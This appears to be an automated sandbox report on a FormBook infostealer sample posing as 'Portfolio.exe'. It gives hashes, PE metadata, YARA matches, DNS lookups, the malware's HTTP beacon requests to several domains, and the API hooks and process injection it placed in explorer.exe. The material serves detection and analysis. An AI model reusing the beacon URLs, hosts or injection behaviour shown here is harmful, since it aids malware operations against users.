Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.55999179720045
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Portfolio.exe
File size:	925696
MD5:	9fa479c87543e7dd199296f7029991c9
SHA1:	649bf55700b6828989dbcf4c5d792ba93fa5b2e0
SHA256:	5cb8d74227cc43368e24ef8f94c5ae38a2f2c259a1701b1efa4f6b5042e4544d
SHA512:	00487024f09ca717572408ed479f562e949396b99ada02496d51353dad7a602f42c27a9d87a6c2a4ad0c29cb884366e091d32221f7d572b4d2c3d33188e7ec27
SSDEEP:	24576:LGuAeBVuO+r4mWRvxb58rvkYAm7bZxxpb:bAef+0hurMFiZJ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P.............b.... ........@.. .......................`............@................................

File Icon


Icon Hash:	e8e8c4ccc4c4ecf8

Static PE Info

General
Entrypoint:	0x4b9f62
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60739AE1 [Mon Apr 12 00:57:05 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add eax, dword ptr [eax]
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+0000000Eh], al
mov byte ptr [eax], al
add byte ptr [eax+00000010h], al
mov al, byte ptr [18800000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb9f10	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba000	0x29b6c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb7f68	0xb8000	False	0.955612846043	data	7.95191633624	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xba000	0x29b6c	0x29c00	False	0.126906343563	data	3.6950741891	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe4000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xba2b0	0x1b1b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xbbdcc	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0xcc5f4	0x94a8	data
RT_ICON	0xd5a9c	0x5488	data
RT_ICON	0xdaf24	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 64767, next used block 4282318848
RT_ICON	0xdf14c	0x25a8	data
RT_ICON	0xe16f4	0x10a8	data
RT_ICON	0xe279c	0x988	data
RT_ICON	0xe3124	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xe358c	0x84	data
RT_VERSION	0xe3610	0x36e	data
RT_MANIFEST	0xe3980	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2012
Assembly Version	8.1.1.15
InternalName	SiteString.exe
FileVersion	8.1.1.14
CompanyName	Landskip Yard Care
LegalTrademarks	A++
Comments
ProductName	LevelActivator
ProductVersion	8.1.1.14
FileDescription	LevelActivator
OriginalFilename	SiteString.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/12/21-09:18:56.354521	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49729	34.102.136.180	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 09:18:13.403533936 CEST	49718	80	192.168.2.5	168.206.243.213
Apr 12, 2021 09:18:13.702488899 CEST	80	49718	168.206.243.213	192.168.2.5
Apr 12, 2021 09:18:13.702672005 CEST	49718	80	192.168.2.5	168.206.243.213
Apr 12, 2021 09:18:14.225862980 CEST	49718	80	192.168.2.5	168.206.243.213
Apr 12, 2021 09:18:14.524841070 CEST	80	49718	168.206.243.213	192.168.2.5
Apr 12, 2021 09:18:14.542177916 CEST	80	49718	168.206.243.213	192.168.2.5
Apr 12, 2021 09:18:14.542432070 CEST	49718	80	192.168.2.5	168.206.243.213
Apr 12, 2021 09:18:14.773441076 CEST	49718	80	192.168.2.5	168.206.243.213
Apr 12, 2021 09:18:15.073348999 CEST	80	49718	168.206.243.213	192.168.2.5
Apr 12, 2021 09:18:35.118082047 CEST	49726	80	192.168.2.5	72.167.241.46
Apr 12, 2021 09:18:35.302615881 CEST	80	49726	72.167.241.46	192.168.2.5
Apr 12, 2021 09:18:35.302942991 CEST	49726	80	192.168.2.5	72.167.241.46
Apr 12, 2021 09:18:35.303118944 CEST	49726	80	192.168.2.5	72.167.241.46
Apr 12, 2021 09:18:35.528446913 CEST	80	49726	72.167.241.46	192.168.2.5
Apr 12, 2021 09:18:35.793289900 CEST	49726	80	192.168.2.5	72.167.241.46
Apr 12, 2021 09:18:35.979032040 CEST	80	49726	72.167.241.46	192.168.2.5
Apr 12, 2021 09:18:35.979347944 CEST	49726	80	192.168.2.5	72.167.241.46
Apr 12, 2021 09:18:56.174531937 CEST	49729	80	192.168.2.5	34.102.136.180
Apr 12, 2021 09:18:56.217588902 CEST	80	49729	34.102.136.180	192.168.2.5
Apr 12, 2021 09:18:56.217716932 CEST	49729	80	192.168.2.5	34.102.136.180
Apr 12, 2021 09:18:56.217859983 CEST	49729	80	192.168.2.5	34.102.136.180
Apr 12, 2021 09:18:56.258953094 CEST	80	49729	34.102.136.180	192.168.2.5
Apr 12, 2021 09:18:56.354521036 CEST	80	49729	34.102.136.180	192.168.2.5
Apr 12, 2021 09:18:56.354548931 CEST	80	49729	34.102.136.180	192.168.2.5
Apr 12, 2021 09:18:56.354756117 CEST	49729	80	192.168.2.5	34.102.136.180
Apr 12, 2021 09:18:56.357501030 CEST	49729	80	192.168.2.5	34.102.136.180
Apr 12, 2021 09:18:56.399213076 CEST	80	49729	34.102.136.180	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 09:16:56.719543934 CEST	65307	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:16:56.724289894 CEST	53	54302	8.8.8.8	192.168.2.5
Apr 12, 2021 09:16:56.741008043 CEST	53	53784	8.8.8.8	192.168.2.5
Apr 12, 2021 09:16:56.768624067 CEST	53	65307	8.8.8.8	192.168.2.5
Apr 12, 2021 09:16:56.996309042 CEST	64344	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:16:57.058957100 CEST	53	64344	8.8.8.8	192.168.2.5
Apr 12, 2021 09:16:59.871938944 CEST	62060	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:16:59.930143118 CEST	53	62060	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:03.261941910 CEST	61805	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:03.313592911 CEST	53	61805	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:04.442276955 CEST	54795	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:04.491070032 CEST	53	54795	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:05.688694954 CEST	49557	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:05.737376928 CEST	53	49557	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:07.316914082 CEST	61733	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:07.368558884 CEST	53	61733	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:08.595067978 CEST	65447	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:08.646498919 CEST	53	65447	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:09.392225981 CEST	52441	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:09.451770067 CEST	53	52441	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:11.835546970 CEST	62176	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:11.888118982 CEST	53	62176	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:16.299854040 CEST	59596	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:16.348552942 CEST	53	59596	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:23.526071072 CEST	65296	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:23.587982893 CEST	53	65296	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:34.194977999 CEST	63183	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:34.243963003 CEST	53	63183	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:34.615463972 CEST	60151	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:34.672692060 CEST	53	60151	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:37.051789045 CEST	56969	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:37.103430033 CEST	53	56969	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:45.247093916 CEST	55161	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:45.296128988 CEST	53	55161	8.8.8.8	192.168.2.5
Apr 12, 2021 09:17:48.020668030 CEST	54757	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:17:48.084284067 CEST	53	54757	8.8.8.8	192.168.2.5
Apr 12, 2021 09:18:13.175550938 CEST	49992	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:18:13.374707937 CEST	53	49992	8.8.8.8	192.168.2.5
Apr 12, 2021 09:18:19.340118885 CEST	60075	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:18:19.391705990 CEST	53	60075	8.8.8.8	192.168.2.5
Apr 12, 2021 09:18:24.494021893 CEST	55016	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:18:24.552732944 CEST	53	55016	8.8.8.8	192.168.2.5
Apr 12, 2021 09:18:35.042262077 CEST	64345	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:18:35.115943909 CEST	53	64345	8.8.8.8	192.168.2.5
Apr 12, 2021 09:18:42.661338091 CEST	57128	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:18:42.733763933 CEST	53	57128	8.8.8.8	192.168.2.5
Apr 12, 2021 09:18:55.673382044 CEST	54791	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:18:55.722364902 CEST	53	54791	8.8.8.8	192.168.2.5
Apr 12, 2021 09:18:55.992079020 CEST	50463	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:18:56.173592091 CEST	53	50463	8.8.8.8	192.168.2.5
Apr 12, 2021 09:18:57.861156940 CEST	50394	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:18:57.918423891 CEST	53	50394	8.8.8.8	192.168.2.5
Apr 12, 2021 09:19:16.567157984 CEST	58530	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:19:16.711580038 CEST	53	58530	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 09:16:56.996309042 CEST	192.168.2.5	8.8.8.8	0x5e4c	Standard query (0)	clientconfig.passport.net	A (IP address)	IN (0x0001)
Apr 12, 2021 09:18:13.175550938 CEST	192.168.2.5	8.8.8.8	0xc103	Standard query (0)	www.timcrozier.com	A (IP address)	IN (0x0001)
Apr 12, 2021 09:18:35.042262077 CEST	192.168.2.5	8.8.8.8	0xf95d	Standard query (0)	www.fromthepittothepitts.com	A (IP address)	IN (0x0001)
Apr 12, 2021 09:18:55.992079020 CEST	192.168.2.5	8.8.8.8	0x29c	Standard query (0)	www.scaledsales.com	A (IP address)	IN (0x0001)
Apr 12, 2021 09:19:16.567157984 CEST	192.168.2.5	8.8.8.8	0x9ae8	Standard query (0)	www.andersensweddinginvitations.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 09:16:57.058957100 CEST	8.8.8.8	192.168.2.5	0x5e4c	No error (0)	clientconfig.passport.net	authgfx.msa.akadns6.net		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 09:18:13.374707937 CEST	8.8.8.8	192.168.2.5	0xc103	No error (0)	www.timcrozier.com		168.206.243.213	A (IP address)	IN (0x0001)
Apr 12, 2021 09:18:35.115943909 CEST	8.8.8.8	192.168.2.5	0xf95d	No error (0)	www.fromthepittothepitts.com	fromthepittothepitts.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 09:18:35.115943909 CEST	8.8.8.8	192.168.2.5	0xf95d	No error (0)	fromthepittothepitts.com		72.167.241.46	A (IP address)	IN (0x0001)
Apr 12, 2021 09:18:56.173592091 CEST	8.8.8.8	192.168.2.5	0x29c	No error (0)	www.scaledsales.com	scaledsales.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 09:18:56.173592091 CEST	8.8.8.8	192.168.2.5	0x29c	No error (0)	scaledsales.com		34.102.136.180	A (IP address)	IN (0x0001)
Apr 12, 2021 09:19:16.711580038 CEST	8.8.8.8	192.168.2.5	0x9ae8	No error (0)	www.andersensweddinginvitations.com		66.96.162.147	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.timcrozier.com

www.fromthepittothepitts.com

www.scaledsales.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49718	168.206.243.213	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 09:18:14.225862980 CEST	1412	OUT	GET /dwj/?Cj=lN985vvxrLh4&HTrLdvY=vjdFX+deElwkJL3jjCyofcRGlviK7hY6fmHNPu6niYhLdTNZ+9C3ClVYQHWQZWwEwEGo HTTP/1.1 Host: www.timcrozier.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 09:18:14.542177916 CEST	1413	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 12 Apr 2021 07:18:14 GMT Content-Type: text/html Content-Length: 479 Connection: close ETag: "5cf0c6a3-1df" Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49726	72.167.241.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 09:18:35.303118944 CEST	4761	OUT	GET /dwj/?HTrLdvY=e+9w//LrkNQAvat7yjjfVebmP7O5RIC5nL700LrPx65Ls1GCtX2Cw2Ubn7E5A1TTieM1&Cj=lN985vvxrLh4 HTTP/1.1 Host: www.fromthepittothepitts.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 09:18:35.979032040 CEST	4762	IN	HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49729	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 09:18:56.217859983 CEST	4804	OUT	GET /dwj/?Cj=lN985vvxrLh4&HTrLdvY=jCwgb33wmR2YDM1wuLgRTH38yeb9sMyK3XA0ZXE7/yU9OdwyZBI+RqEK8elpwbEptz+b HTTP/1.1 Host: www.scaledsales.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 09:18:56.354521036 CEST	4805	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 12 Apr 2021 07:18:56 GMT Content-Type: text/html Content-Length: 275 ETag: "60737c38-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE1
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE1
GetMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE1
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE1

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Portfolio.exe PID: 5880 Parent PID: 5592

General

Start time:	09:17:04
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\Portfolio.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Portfolio.exe'
Imagebase:	0xfd0000
File size:	925696 bytes
MD5 hash:	9FA479C87543E7DD199296F7029991C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.252926038.00000000045D5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.250046779.0000000003476000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Portfolio.exe PID: 2964 Parent PID: 5880

General

Start time:	09:17:13
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\Portfolio.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Portfolio.exe
Imagebase:	0xda0000
File size:	925696 bytes
MD5 hash:	9FA479C87543E7DD199296F7029991C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.294841079.0000000001620000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.294742769.00000000015F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 2964

General

Start time:	09:17:16
Start date:	12/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mstsc.exe PID: 1320 Parent PID: 3472

General

Start time:	09:17:33
